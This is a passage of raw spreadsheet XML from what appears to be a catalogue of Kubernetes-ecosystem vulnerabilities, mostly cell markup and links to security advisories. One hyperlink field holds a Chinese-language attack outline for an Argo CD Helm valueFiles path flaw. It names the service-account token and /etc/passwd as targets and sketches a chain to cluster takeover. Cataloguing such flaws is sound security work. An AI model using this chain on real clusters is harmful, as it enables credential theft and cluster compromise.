      <c r="B42" s="6" t="s">
        <v>890</v>
      </c>
      <c r="C42" s="7" t="s">
        <v>1344</v>
      </c>
      <c r="D42" s="7" t="s">
        <v>1345</v>
      </c>
      <c r="E42" s="7" t="s">
        <v>1346</v>
      </c>
      <c r="F42" s="5" t="s">
        <v>900</v>
      </c>
      <c r="G42" s="7" t="s">
        <v>1347</v>
      </c>
      <c r="H42" s="6" t="s">
        <v>891</v>
      </c>
      <c r="I42" s="6" t="s">
        <v>283</v>
      </c>
      <c r="J42" s="6" t="s">
        <v>894</v>
      </c>
      <c r="K42" s="15" t="s">
        <v>895</v>
      </c>
      <c r="L42" s="6" t="s">
        <v>896</v>
      </c>
      <c r="M42" s="6" t="s">
        <v>897</v>
      </c>
      <c r="N42" s="6" t="s">
        <v>1348</v>
      </c>
      <c r="O42" s="41" t="s">
        <v>1603</v>
      </c>
      <c r="P42" s="6" t="s">
        <v>67</v>
      </c>
      <c r="Q42" s="6" t="s">
        <v>1604</v>
      </c>
      <c r="R42" s="6"/>
      <c r="S42" s="6" t="s">
        <v>1605</v>
      </c>
      <c r="T42" s="6" t="s">
        <v>69</v>
      </c>
      <c r="U42" s="6" t="s">
        <v>1606</v>
      </c>
    </row>
    <row r="43" s="23" customFormat="1" ht="409.5" spans="1:21">
      <c r="A43" s="11" t="s">
        <v>934</v>
      </c>
      <c r="B43" s="11" t="s">
        <v>934</v>
      </c>
      <c r="C43" s="7" t="s">
        <v>1349</v>
      </c>
      <c r="D43" s="7" t="s">
        <v>1350</v>
      </c>
      <c r="E43" s="7" t="s">
        <v>1351</v>
      </c>
      <c r="F43" s="11" t="s">
        <v>943</v>
      </c>
      <c r="G43" s="7" t="s">
        <v>1352</v>
      </c>
      <c r="H43" s="11" t="s">
        <v>1353</v>
      </c>
      <c r="I43" s="11" t="s">
        <v>283</v>
      </c>
      <c r="J43" s="11" t="s">
        <v>1607</v>
      </c>
      <c r="K43" s="11" t="s">
        <v>939</v>
      </c>
      <c r="L43" s="11" t="s">
        <v>940</v>
      </c>
      <c r="M43" s="11" t="s">
        <v>941</v>
      </c>
      <c r="N43" s="11" t="s">
        <v>942</v>
      </c>
      <c r="O43" s="41" t="s">
        <v>1608</v>
      </c>
      <c r="P43" s="11" t="s">
        <v>67</v>
      </c>
      <c r="Q43" s="11" t="s">
        <v>1604</v>
      </c>
      <c r="R43" s="11"/>
      <c r="S43" s="11" t="s">
        <v>1609</v>
      </c>
      <c r="T43" s="11" t="s">
        <v>237</v>
      </c>
      <c r="U43" s="6" t="s">
        <v>1606</v>
      </c>
    </row>
    <row r="44" s="23" customFormat="1" ht="409.5" spans="1:21">
      <c r="A44" s="12" t="s">
        <v>1354</v>
      </c>
      <c r="B44" s="11" t="s">
        <v>1355</v>
      </c>
      <c r="C44" s="7" t="s">
        <v>1356</v>
      </c>
      <c r="D44" s="7" t="s">
        <v>1357</v>
      </c>
      <c r="E44" s="7" t="s">
        <v>1358</v>
      </c>
      <c r="F44" s="11" t="s">
        <v>954</v>
      </c>
      <c r="G44" s="7"/>
      <c r="H44" s="11" t="s">
        <v>945</v>
      </c>
      <c r="I44" s="12" t="s">
        <v>283</v>
      </c>
      <c r="J44" s="11" t="s">
        <v>948</v>
      </c>
      <c r="K44" s="12" t="s">
        <v>949</v>
      </c>
      <c r="L44" s="11" t="s">
        <v>950</v>
      </c>
      <c r="M44" s="11" t="s">
        <v>951</v>
      </c>
      <c r="N44" s="11" t="s">
        <v>952</v>
      </c>
      <c r="O44" s="41" t="s">
        <v>1610</v>
      </c>
      <c r="P44" s="11" t="s">
        <v>67</v>
      </c>
      <c r="Q44" s="12" t="s">
        <v>1611</v>
      </c>
      <c r="R44" s="12"/>
      <c r="S44" s="12" t="s">
        <v>953</v>
      </c>
      <c r="T44" s="12" t="s">
        <v>69</v>
      </c>
      <c r="U44" s="6" t="s">
        <v>525</v>
      </c>
    </row>
    <row r="45" s="23" customFormat="1" ht="326.25" spans="1:21">
      <c r="A45" s="5" t="s">
        <v>956</v>
      </c>
      <c r="B45" s="31" t="s">
        <v>1360</v>
      </c>
      <c r="C45" s="31" t="s">
        <v>1361</v>
      </c>
      <c r="D45" s="31" t="s">
        <v>1362</v>
      </c>
      <c r="E45" s="31" t="s">
        <v>1363</v>
      </c>
      <c r="F45" s="5" t="s">
        <v>963</v>
      </c>
      <c r="G45" s="31" t="s">
        <v>1364</v>
      </c>
      <c r="H45" s="5" t="s">
        <v>957</v>
      </c>
      <c r="I45" s="5" t="s">
        <v>486</v>
      </c>
      <c r="J45" s="5"/>
      <c r="K45" s="5" t="s">
        <v>960</v>
      </c>
      <c r="L45" s="5" t="s">
        <v>63</v>
      </c>
      <c r="M45" s="5" t="s">
        <v>961</v>
      </c>
      <c r="N45" s="5" t="s">
        <v>1366</v>
      </c>
      <c r="O45" s="41" t="s">
        <v>1612</v>
      </c>
      <c r="P45" s="6" t="s">
        <v>647</v>
      </c>
      <c r="Q45" s="6" t="s">
        <v>1542</v>
      </c>
      <c r="R45" s="6" t="s">
        <v>1543</v>
      </c>
      <c r="S45" s="6" t="s">
        <v>70</v>
      </c>
      <c r="T45" s="6" t="s">
        <v>1547</v>
      </c>
      <c r="U45" s="6" t="s">
        <v>1545</v>
      </c>
    </row>
    <row r="46" s="23" customFormat="1" ht="326.25" spans="1:21">
      <c r="A46" s="5" t="s">
        <v>974</v>
      </c>
      <c r="B46" s="6" t="s">
        <v>1368</v>
      </c>
      <c r="C46" s="31" t="s">
        <v>1369</v>
      </c>
      <c r="D46" s="31" t="s">
        <v>1370</v>
      </c>
      <c r="E46" s="31" t="s">
        <v>1371</v>
      </c>
      <c r="F46" s="5" t="s">
        <v>1372</v>
      </c>
      <c r="G46" s="31" t="s">
        <v>1373</v>
      </c>
      <c r="H46" s="5" t="s">
        <v>957</v>
      </c>
      <c r="I46" s="5" t="s">
        <v>486</v>
      </c>
      <c r="J46" s="14" t="s">
        <v>976</v>
      </c>
      <c r="K46" s="5" t="s">
        <v>977</v>
      </c>
      <c r="L46" s="5" t="s">
        <v>63</v>
      </c>
      <c r="M46" s="5" t="s">
        <v>961</v>
      </c>
      <c r="N46" s="5" t="s">
        <v>1366</v>
      </c>
      <c r="O46" s="41" t="s">
        <v>1613</v>
      </c>
      <c r="P46" s="6" t="s">
        <v>647</v>
      </c>
      <c r="Q46" s="6" t="s">
        <v>1542</v>
      </c>
      <c r="R46" s="6" t="s">
        <v>1543</v>
      </c>
      <c r="S46" s="6" t="s">
        <v>70</v>
      </c>
      <c r="T46" s="6" t="s">
        <v>1547</v>
      </c>
      <c r="U46" s="6" t="s">
        <v>1545</v>
      </c>
    </row>
    <row r="47" s="23" customFormat="1" ht="326.25" spans="1:21">
      <c r="A47" s="5" t="s">
        <v>985</v>
      </c>
      <c r="B47" s="6" t="s">
        <v>1375</v>
      </c>
      <c r="C47" s="31" t="s">
        <v>1376</v>
      </c>
      <c r="D47" s="31" t="s">
        <v>1377</v>
      </c>
      <c r="E47" s="31" t="s">
        <v>1378</v>
      </c>
      <c r="F47" s="5" t="s">
        <v>990</v>
      </c>
      <c r="G47" s="31" t="s">
        <v>1379</v>
      </c>
      <c r="H47" s="5" t="s">
        <v>957</v>
      </c>
      <c r="I47" s="5" t="s">
        <v>486</v>
      </c>
      <c r="J47" s="14" t="s">
        <v>988</v>
      </c>
      <c r="K47" s="5" t="s">
        <v>989</v>
      </c>
      <c r="L47" s="32" t="s">
        <v>63</v>
      </c>
      <c r="M47" s="32" t="s">
        <v>961</v>
      </c>
      <c r="N47" s="32" t="s">
        <v>1366</v>
      </c>
      <c r="O47" s="41" t="s">
        <v>1614</v>
      </c>
      <c r="P47" s="6" t="s">
        <v>647</v>
      </c>
      <c r="Q47" s="6" t="s">
        <v>1542</v>
      </c>
      <c r="R47" s="6" t="s">
        <v>1543</v>
      </c>
      <c r="S47" s="6" t="s">
        <v>70</v>
      </c>
      <c r="T47" s="6" t="s">
        <v>1547</v>
      </c>
      <c r="U47" s="6" t="s">
        <v>1545</v>
      </c>
    </row>
    <row r="48" ht="348.75" spans="1:21">
      <c r="A48" s="5" t="s">
        <v>999</v>
      </c>
      <c r="B48" s="6" t="s">
        <v>1381</v>
      </c>
      <c r="C48" s="30" t="s">
        <v>1382</v>
      </c>
      <c r="D48" s="30" t="s">
        <v>1383</v>
      </c>
      <c r="E48" s="30" t="s">
        <v>1384</v>
      </c>
      <c r="F48" s="5" t="s">
        <v>1385</v>
      </c>
      <c r="G48" s="31" t="s">
        <v>1386</v>
      </c>
      <c r="I48" s="5" t="s">
        <v>486</v>
      </c>
      <c r="J48" s="5" t="s">
        <v>1002</v>
      </c>
      <c r="K48" s="5" t="s">
        <v>1003</v>
      </c>
      <c r="L48" s="5" t="s">
        <v>63</v>
      </c>
      <c r="M48" s="5" t="s">
        <v>961</v>
      </c>
      <c r="N48" s="5" t="s">
        <v>1387</v>
      </c>
      <c r="O48" s="28" t="s">
        <v>1615</v>
      </c>
      <c r="P48" s="5" t="s">
        <v>396</v>
      </c>
      <c r="Q48" s="5" t="s">
        <v>1562</v>
      </c>
      <c r="S48" s="5" t="s">
        <v>70</v>
      </c>
      <c r="T48" s="5" t="s">
        <v>540</v>
      </c>
      <c r="U48" s="6" t="s">
        <v>1545</v>
      </c>
    </row>
    <row r="1048565" s="5" customFormat="1" ht="11.25"/>
    <row r="1048566" s="5" customFormat="1" ht="11.25"/>
    <row r="1048567" s="5" customFormat="1" ht="11.25"/>
    <row r="1048568" s="5" customFormat="1" ht="11.25"/>
    <row r="1048569" s="5" customFormat="1" ht="11.25"/>
    <row r="1048570" s="5" customFormat="1" ht="11.25"/>
    <row r="1048571" s="5" customFormat="1" ht="11.25"/>
    <row r="1048572" s="5" customFormat="1" ht="11.25"/>
    <row r="1048573" s="5" customFormat="1" ht="11.25"/>
    <row r="1048574" s="5" customFormat="1" ht="11.25"/>
    <row r="1048575" s="5" customFormat="1" ht="11.25"/>
    <row r="1048576" s="5" customFormat="1" ht="11.25"/>
  </sheetData>
  <autoFilter xmlns:etc="http://www.wps.cn/officeDocument/2017/etCustomData" ref="A1:U48" etc:filterBottomFollowUsedRange="0">
    <extLst/>
  </autoFilter>
  <conditionalFormatting sqref="B$1:B$1048576">
    <cfRule type="duplicateValues" dxfId="0" priority="1"/>
  </conditionalFormatting>
  <hyperlinks>
    <hyperlink ref="K9" r:id="rId1" display="&#10;nginx-ingress:&#10;k8s: https://github.com/kubernetes/kubernetes/issues/126811" tooltip="https://github.com/kubernetes/kubernetes/issues/126811"/>
    <hyperlink ref="K8" r:id="rId2" display="https://github.com/kubernetes/kubernetes/issues/126812" tooltip="https://github.com/kubernetes/kubernetes/issues/126812"/>
    <hyperlink ref="K7" r:id="rId3" display="https://github.com/kubernetes/kubernetes/issues/126813" tooltip="https://github.com/kubernetes/kubernetes/issues/126813"/>
    <hyperlink ref="K6" r:id="rId4" display="https://github.com/kubernetes/ingress-nginx/issues/10572" tooltip="https://github.com/kubernetes/ingress-nginx/issues/10572"/>
    <hyperlink ref="K10" r:id="rId5" display="https://github.com/istio/istio/security/advisories/GHSA-mq8f-9446-c28r" tooltip="https://github.com/istio/istio/security/advisories/GHSA-mq8f-9446-c28r"/>
    <hyperlink ref="K13" r:id="rId6" display="https://github.com/cri-o/cri-o/security/advisories/GHSA-6x2m-w449-qwx7"/>
    <hyperlink ref="K11" r:id="rId7" display="https://github.com/cri-o/cri-o/security/advisories/GHSA-2cgq-h8xw-2v5j"/>
    <hyperlink ref="J18" r:id="rId8" display="Patched versions&#10;0.55.1&#10;&#10;&#10;https://github.com/kubevirt/kubevirt/pull/8198&#10;https://github.com/kubevirt/kubevirt/pull/8268&#10;&#10;"/>
    <hyperlink ref="J19" r:id="rId9" display="kubevirt 0.30&#10;&#10;https://github.com/kubevirt/kubevirt/pull/3686"/>
    <hyperlink ref="K20" r:id="rId10" display="https://github.com/argoproj/argo-workflows/security/advisories/GHSA-cmv8-6362-r5w9"/>
    <hyperlink ref="K33" r:id="rId11" display="https://github.com/fluxcd/kustomize-controller/security/advisories/GHSA-35rf-v2jv-gfg7"/>
    <hyperlink ref="K16" r:id="rId12" display="https://github.com/cilium/cilium/security/advisories/GHSA-gj2r-phwg-6rww"/>
    <hyperlink ref="K17" r:id="rId13" display="https://github.com/projectcontour/contour/security/advisories/GHSA-5ph6-qq5x-7jwc"/>
    <hyperlink ref="K27" r:id="rId14" display="https://github.com/argoproj/argo-cd/security/advisories/GHSA-h6h5-6fmq-rh28"/>
    <hyperlink ref="J28" r:id="rId15" display="2.6.1&#10;https://github.com/argoproj/argo-cd/pull/12320/commits/200c3c156e9c27c6c5b197a5be28315e9b802b12"/>
    <hyperlink ref="K28" r:id="rId16" display="https://github.com/argoproj/argo-cd/issues/12309&#10;&#10;https://github.com/argoproj/argo-cd/security/advisories/GHSA-mv6w-j4xc-qpfw"/>
    <hyperlink ref="K25" r:id="rId17" display="https://github.com/argoproj/argo-events/security/advisories/GHSA-qpgx-64h2-gc3c&#10;&#10;https://github.com/argoproj/argo-events/issues/1947"/>
    <hyperlink ref="N26" r:id="rId18" display="https://apiiro.com/blog/malicious-kubernetes-helm-charts-can-be-used-to-steal-sensitive-information-from-argo-cd-deployments/&#10;&#10;&#10; 1..敏感信息泄露&#10;​目标文件：&#10;Kubernetes Secrets（如/var/run/secrets/kubernetes.io/serviceaccount/token）；&#10;其他应用的明文配置文件（如数据库凭证）；&#10;系统敏感文件（如/etc/passwd）。&#10;​攻击步骤：&#10;提交包含恶意valueFiles路径的Helm Chart至仓库；&#10;Argo CD同步时触发helmTemplate逻辑；&#10;url.ParseRequestURI()误判路径为URI，跳过EnforceToCurrentRoot()检查；&#10;读取目标文件内容并解析为YAML参数，通过Argo CD API或UI泄露。&#10;2. ​横向移动与权限提升&#10;​场景延伸：&#10;窃取集群管理员Token，通过kubectl接管集群；&#10;读取其他应用的values.yaml，获取数据库连接字符串等敏感信息；&#10;利用泄露的SSH密钥访问内部系统。&#10;​利用链示例：&#10;mermaid&#10;graph TD&#10;    A[提交恶意Chart] --&gt; B[绕过路径检查]&#10;    B --&gt; C[读取ServiceAccount Token]&#10;    C --&gt; D[通过kubectl执行任意命令]&#10;    D --&gt; E[部署恶意Pod或窃取数据]&#10;3. ​供应链攻击&#10;​污染公共Helm仓库：&#10;攻击者上传包含恶意valueFiles的Chart至公共仓库（如Artifact Hub），诱导用户部署。&#10;​后果：&#10;所有使用该Chart的Argo CD实例自动同步后，敏感数据将泄露至攻击者控制的端点&#10;&#10;"/>
    <hyperlink ref="K24" r:id="rId19" display="https://github.com/argoproj/argo-workflows/issues/6441&#10;&#10;https://github.com/argoproj/argo-workflows/security/advisories/GHSA-h563-xh25-x54q"/>
    <hyperlink ref="K31" r:id="rId20" display="https://github.com/backstage/backstage/security/advisories/GHSA-wg6p-jmpc-xjmr"/>
    <hyperlink ref="K32" r:id="rId21" display="https://github.com/backstage/backstage/security/advisories/GHSA-pvv8-8fx9-h673"/>
    <hyperlink ref="J34" r:id="rId22" display="https://github.com/fluxcd/source-controller/pull/903/commits/27f4ed5a472d1bd5b6bc7a62189f20c115338b3a"/>
    <hyperlink ref="K35" r:id="rId23" display="https://github.com/fluxcd/flux2/security/advisories/GHSA-p2g7-xwvr-rrw3"/>
    <hyperlink ref="K34" r:id="rId24" display="https://github.com/fluxcd/flux2/security/advisories/GHSA-f4p5-x4vc-mh4v"/>
    <hyperlink ref="K37" r:id="rId25" display="https://github.com/fluxcd/flux2/security/advisories/GHSA-7pwf-jg34-hxwp"/>
    <hyperlink ref="K18" r:id="rId26" display="https://github.com/kubevirt/kubevirt/security/advisories/GHSA-qv98-3369-g364&#10;&#10;google research:&#10;https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm"/>
    <hyperlink ref="K19" r:id="rId27" display="https://bugzilla.redhat.com/show_bug.cgi?id=1848951"/>
    <hyperlink ref="K15" r:id="rId28" display="https://github.com/containerd/containerd/security/advisories/GHSA-5ffw-gxpp-mxpf"/>
    <hyperlink ref="K42" r:id="rId29" display="https://github.com/metal3-io/baremetal-operator/security/advisories/GHSA-pqfh-xh7w-7h3p"/>
    <hyperlink ref="K2" r:id="rId30" display="https://github.com/kubernetes/kubernetes/issues/126744"/>
    <hyperlink ref="K38" r:id="rId31" display="https://github.com/fluxcd/flux2/security/advisories/GHSA-vvmq-fwmg-2gjc" tooltip="https://github.com/fluxcd/flux2/security/advisories/GHSA-vvmq-fwmg-2gjc"/>
    <hyperlink ref="K21" r:id="rId32" display="https://github.com/argoproj/argo-cd/security/advisories/GHSA-q4w5-4gq2-98vm"/>
    <hyperlink ref="K22" r:id="rId33" display="https://github.com/argoproj/argo-cd/security/advisories/GHSA-jhqp-vf4w-rpwq"/>
    <hyperlink ref="K47" r:id="rId34" display="https://github.com/kubernetes/kubernetes/issues/131006" tooltip="https://github.com/kubernetes/kubernetes/issues/131006"/>
    <hyperlink ref="K46" r:id="rId35" display="https://github.com/kubernetes/kubernetes/issues/131008" tooltip="https://github.com/kubernetes/kubernetes/issues/131008"/>
    <hyperlink ref="K45" r:id="rId36" display="https://github.com/kubernetes/kubernetes/issues/131007" tooltip="https://github.com/kubernetes/kubernetes/issues/131007"/>
    <hyperlink ref="K48" r:id="rId37" display="https://github.com/kubernetes/kubernetes/issues/131005&#10;&#10;https://github.com/advisories/GHSA-242m-6h72-7hgp"/>
    <hyperlink ref="J47" r:id="rId38" display="https://github.com/kubernetes/ingress-nginx/pull/13068/commits/ab470eb920924d62a197ebddd8a4cc3031a77ddf"/>
    <hyperlink ref="J46" r:id="rId39" display="https://github.com/kubernetes/ingress-nginx/pull/13068/commits/2e9f37380afb7853fa6daa1c3e6659550aadfd90"/>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8"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="3" ySplit="1" topLeftCell="D24" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="E25" sqref="E25"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.89166666666667" defaultRowHeight="13.5"/>
  <cols>
    <col min="1" max="1" width="8.89166666666667" style="22"/>
    <col min="2" max="2" width="8.89166666666667" style="24" customWidth="1"/>
    <col min="3" max="3" width="26.1083333333333" style="22" customWidth="1"/>
    <col min="4" max="4" width="19.8916666666667" style="22" customWidth="1"/>
    <col min="5" max="5" width="8.89166666666667" style="22" customWidth="1"/>
    <col min="6" max="6" width="25.225" style="22" customWidth="1"/>
    <col min="7" max="7" width="17.225" style="22" customWidth="1"/>
    <col min="8" max="8" width="32.1083333333333" style="22" customWidth="1"/>
    <col min="9" max="9" width="8.89166666666667" style="22"/>
    <col min="10" max="10" width="33.3333333333333" style="22" customWidth="1"/>
    <col min="11" max="15" width="8.89166666666667" style="22" customWidth="1"/>
    <col min="16" max="16" width="34.3333333333333" style="22" customWidth="1"/>
    <col min="17" max="17" width="8.89166666666667" style="22"/>
    <col min="18" max="18" width="28.1083333333333" style="22" customWidth="1"/>
    <col min="19" max="19" width="8.89166666666667" style="22"/>
    <col min="20" max="21" width="8.89166666666667" style="26" customWidth="1"/>
    <col min="22" max="22" width="35.225" style="26" customWidth="1"/>
    <col min="23" max="23" width="21.1083333333333" style="27" customWidth="1"/>
    <col min="24" max="24" width="17.8916666666667" style="28" customWidth="1"/>
    <col min="25" max="26" width="10" style="28"/>
    <col min="27" max="16384" width="8.89166666666667" style="22"/>
  </cols>
  <sheetData>
    <row r="1" s="22" customFormat="1" ht="45" spans="1:26">
      <c r="A1" s="5" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="5" t="s">
        <v>1014</v>
      </c>
      <c r="C1" s="29" t="s">
        <v>1015</v>
      </c>
      <c r="D1" s="30" t="s">
        <v>1016</v>
      </c>
      <c r="E1" s="5" t="s">
        <v>1</v>
      </c>
      <c r="F1" s="5" t="s">
        <v>3</v>
      </c>
      <c r="G1" s="5" t="s">
        <v>6</v>
      </c>
      <c r="H1" s="5" t="s">
        <v>5</v>
      </c>
      <c r="I1" s="5" t="s">
        <v>7</v>
      </c>
      <c r="J1" s="5" t="s">
        <v>9</v>
      </c>
      <c r="K1" s="5" t="s">
        <v>14</v>
      </c>
      <c r="L1" s="37" t="s">
        <v>15</v>
      </c>
      <c r="M1" s="37" t="s">
        <v>1616</v>
      </c>
      <c r="N1" s="37" t="s">
        <v>1617</v>
      </c>
      <c r="O1" s="5" t="s">
        <v>47</v>
      </c>
      <c r="P1" s="37" t="s">
        <v>48</v>
      </c>
      <c r="Q1" s="37" t="s">
        <v>1618</v>
      </c>
      <c r="R1" s="37" t="s">
        <v>1619</v>
      </c>
      <c r="S1" s="37" t="s">
        <v>1620</v>
      </c>
      <c r="T1" s="37" t="s">
        <v>50</v>
      </c>
      <c r="U1" s="37" t="s">
        <v>51</v>
      </c>
      <c r="V1" s="37" t="s">
        <v>1621</v>
      </c>
      <c r="W1" s="5" t="s">
        <v>52</v>
      </c>
      <c r="X1" s="28" t="s">
        <v>1622</v>
      </c>
      <c r="Y1" s="28" t="s">
        <v>1623</v>
      </c>
      <c r="Z1" s="28" t="s">
        <v>1624</v>
      </c>
    </row>
    <row r="2" s="23" customFormat="1" ht="281.25" spans="1:26">
      <c r="A2" s="6" t="s">
        <v>1022</v>
      </c>
      <c r="B2" s="4" t="s">
        <v>57</v>
      </c>
      <c r="C2" s="31" t="s">
        <v>1023</v>
      </c>
      <c r="D2" s="31" t="s">
        <v>1024</v>
      </c>
      <c r="E2" s="6"/>
      <c r="F2" s="6" t="s">
        <v>59</v>
      </c>
      <c r="G2" s="15" t="s">
        <v>62</v>
      </c>
      <c r="H2" s="6" t="s">
        <v>61</v>
      </c>
      <c r="I2" s="6" t="s">
        <v>63</v>
      </c>
      <c r="J2" s="6" t="s">
        <v>65</v>
      </c>
      <c r="K2" s="6" t="s">
        <v>70</v>
      </c>
      <c r="L2" s="6" t="s">
        <v>71</v>
      </c>
      <c r="M2" s="6" t="s">
        <v>1029</v>
      </c>
      <c r="N2" s="6"/>
      <c r="O2" s="6" t="s">
        <v>100</v>
      </c>
      <c r="P2" s="6" t="s">
        <v>1035</v>
      </c>
      <c r="Q2" s="40" t="s">
        <v>1625</v>
      </c>
      <c r="R2" s="40" t="s">
        <v>1036</v>
      </c>
      <c r="S2" s="40" t="s">
        <v>1626</v>
      </c>
      <c r="T2" s="40" t="s">
        <v>1037</v>
      </c>
      <c r="U2" s="6" t="s">
        <v>104</v>
      </c>
      <c r="V2" s="6" t="s">
        <v>1627</v>
      </c>
      <c r="W2" s="5" t="s">
        <v>1038</v>
      </c>
      <c r="X2" s="41" t="s">
        <v>1628</v>
      </c>
      <c r="Y2" s="41" t="s">
        <v>1629</v>
      </c>
      <c r="Z2" s="41"/>
    </row>
    <row r="3" s="24" customFormat="1" ht="409.5" spans="1:26">
      <c r="A3" s="5" t="s">
        <v>107</v>
      </c>
      <c r="B3" s="1" t="s">
        <v>1040</v>
      </c>
      <c r="C3" s="30" t="s">
        <v>1041</v>
      </c>
      <c r="D3" s="30" t="s">
        <v>1042</v>
      </c>
      <c r="E3" s="5" t="s">
        <v>108</v>
      </c>
      <c r="F3" s="5" t="s">
        <v>109</v>
      </c>
      <c r="G3" s="5" t="s">
        <v>112</v>
      </c>
      <c r="H3" s="5" t="s">
        <v>111</v>
      </c>
      <c r="I3" s="5" t="s">
        <v>63</v>
      </c>
      <c r="J3" s="5" t="s">
        <v>1045</v>
      </c>
      <c r="K3" s="5" t="s">
        <v>70</v>
      </c>
      <c r="L3" s="5" t="s">
        <v>71</v>
      </c>
      <c r="M3" s="5" t="s">
        <v>1029</v>
      </c>
      <c r="N3" s="5"/>
      <c r="O3" s="5" t="s">
        <v>124</v>
      </c>
      <c r="P3" s="5" t="s">
        <v>125</v>
      </c>
      <c r="Q3" s="42" t="s">
        <v>1630</v>
      </c>
      <c r="R3" s="5" t="s">
        <v>1631</v>
      </c>
      <c r="S3" s="5" t="s">
        <v>1626</v>
      </c>
      <c r="T3" s="5" t="s">
        <v>127</v>
      </c>
      <c r="U3" s="5"/>
      <c r="V3" s="5"/>
      <c r="W3" s="5" t="s">
        <v>1047</v>
      </c>
      <c r="X3" s="28" t="s">
        <v>1632</v>
      </c>
      <c r="Y3" s="41" t="s">
        <v>1629</v>
      </c>
      <c r="Z3" s="28"/>
    </row>
    <row r="4" s="24" customFormat="1" ht="247.5" spans="1:26">
      <c r="A4" s="5" t="s">
        <v>131</v>
      </c>
      <c r="B4" s="1" t="s">
        <v>1048</v>
      </c>
      <c r="C4" s="30" t="s">
        <v>1049</v>
      </c>
      <c r="D4" s="30" t="s">
        <v>1050</v>
      </c>
      <c r="E4" s="5" t="s">
        <v>71</v>
      </c>
      <c r="F4" s="5" t="s">
        <v>132</v>
      </c>
      <c r="G4" s="5" t="s">
        <v>135</v>
      </c>
      <c r="H4" s="5" t="s">
        <v>134</v>
      </c>
      <c r="I4" s="5" t="s">
        <v>63</v>
      </c>
      <c r="J4" s="5" t="s">
        <v>136</v>
      </c>
      <c r="K4" s="5" t="s">
        <v>70</v>
      </c>
      <c r="L4" s="5" t="s">
        <v>71</v>
      </c>
      <c r="M4" s="5" t="s">
        <v>1029</v>
      </c>
      <c r="N4" s="5"/>
      <c r="O4" s="5" t="s">
        <v>124</v>
      </c>
      <c r="P4" s="5" t="s">
        <v>125</v>
      </c>
      <c r="Q4" s="42" t="s">
        <v>1630</v>
      </c>
      <c r="R4" s="5" t="s">
        <v>126</v>
      </c>
      <c r="S4" s="5" t="s">
        <v>1626</v>
      </c>
      <c r="T4" s="5" t="s">
        <v>127</v>
      </c>
      <c r="U4" s="5"/>
      <c r="V4" s="5"/>
      <c r="W4" s="5" t="s">
        <v>1047</v>
      </c>
      <c r="X4" s="28" t="s">
        <v>1633</v>
      </c>
      <c r="Y4" s="41" t="s">
        <v>1629</v>
      </c>
      <c r="Z4" s="28"/>
    </row>
    <row r="5" s="23" customFormat="1" ht="409.5" spans="1:26">
      <c r="A5" s="6" t="s">
        <v>138</v>
      </c>
      <c r="B5" s="4" t="s">
        <v>1053</v>
      </c>
      <c r="C5" s="31" t="s">
        <v>1054</v>
      </c>
      <c r="D5" s="31" t="s">
        <v>1055</v>
      </c>
      <c r="E5" s="6" t="s">
        <v>71</v>
      </c>
      <c r="F5" s="6" t="s">
        <v>140</v>
      </c>
      <c r="G5" s="6" t="s">
        <v>143</v>
      </c>
      <c r="H5" s="6" t="s">
        <v>142</v>
      </c>
      <c r="I5" s="6" t="s">
        <v>63</v>
      </c>
      <c r="J5" s="6" t="s">
        <v>144</v>
      </c>
      <c r="K5" s="6" t="s">
        <v>70</v>
      </c>
      <c r="L5" s="6" t="s">
        <v>71</v>
      </c>
      <c r="M5" s="6" t="s">
        <v>1029</v>
      </c>
      <c r="N5" s="6"/>
      <c r="O5" s="6" t="s">
        <v>100</v>
      </c>
      <c r="P5" s="6" t="s">
        <v>152</v>
      </c>
      <c r="Q5" s="33" t="s">
        <v>1625</v>
      </c>
      <c r="R5" s="6"/>
      <c r="S5" s="6" t="s">
        <v>1626</v>
      </c>
      <c r="T5" s="6"/>
      <c r="U5" s="6"/>
      <c r="V5" s="6" t="s">
        <v>1627</v>
      </c>
      <c r="W5" s="6"/>
      <c r="X5" s="41" t="s">
        <v>1634</v>
      </c>
      <c r="Y5" s="41" t="s">
        <v>1635</v>
      </c>
      <c r="Z5" s="41"/>
    </row>
    <row r="6" s="23" customFormat="1" ht="236.25" spans="1:26">
      <c r="A6" s="5" t="s">
        <v>1058</v>
      </c>
      <c r="B6" s="4" t="s">
        <v>153</v>
      </c>
      <c r="C6" s="31" t="s">
        <v>1059</v>
      </c>
      <c r="D6" s="31" t="s">
        <v>1060</v>
      </c>
      <c r="E6" s="5"/>
      <c r="F6" s="5" t="s">
        <v>154</v>
      </c>
      <c r="G6" s="5" t="s">
        <v>156</v>
      </c>
      <c r="H6" s="5" t="s">
        <v>155</v>
      </c>
      <c r="I6" s="6" t="s">
        <v>63</v>
      </c>
      <c r="J6" s="5" t="s">
        <v>157</v>
      </c>
      <c r="K6" s="6" t="s">
        <v>70</v>
      </c>
      <c r="L6" s="5" t="s">
        <v>71</v>
      </c>
      <c r="M6" s="6" t="s">
        <v>1029</v>
      </c>
      <c r="N6" s="6"/>
      <c r="O6" s="6" t="s">
        <v>100</v>
      </c>
      <c r="P6" s="6" t="s">
        <v>168</v>
      </c>
      <c r="Q6" s="5" t="s">
        <v>1625</v>
      </c>
      <c r="R6" s="5"/>
      <c r="S6" s="5" t="s">
        <v>1626</v>
      </c>
      <c r="T6" s="5"/>
      <c r="U6" s="5"/>
      <c r="V6" s="5" t="s">
        <v>1627</v>
      </c>
      <c r="W6" s="5"/>
      <c r="X6" s="41" t="s">
        <v>1636</v>
      </c>
      <c r="Y6" s="41" t="s">
        <v>1635</v>
      </c>
      <c r="Z6" s="41"/>
    </row>
    <row r="7" s="23" customFormat="1" ht="213.75" spans="1:26">
      <c r="A7" s="32" t="s">
        <v>1064</v>
      </c>
      <c r="B7" s="4" t="s">
        <v>171</v>
      </c>
      <c r="C7" s="31" t="s">
        <v>1065</v>
      </c>
      <c r="D7" s="31" t="s">
        <v>1066</v>
      </c>
      <c r="E7" s="32"/>
      <c r="F7" s="32" t="s">
        <v>172</v>
      </c>
      <c r="G7" s="32" t="s">
        <v>175</v>
      </c>
      <c r="H7" s="32" t="s">
        <v>174</v>
      </c>
      <c r="I7" s="6" t="s">
        <v>63</v>
      </c>
      <c r="J7" s="32" t="s">
        <v>1070</v>
      </c>
      <c r="K7" s="32" t="s">
        <v>70</v>
      </c>
      <c r="L7" s="32" t="s">
        <v>71</v>
      </c>
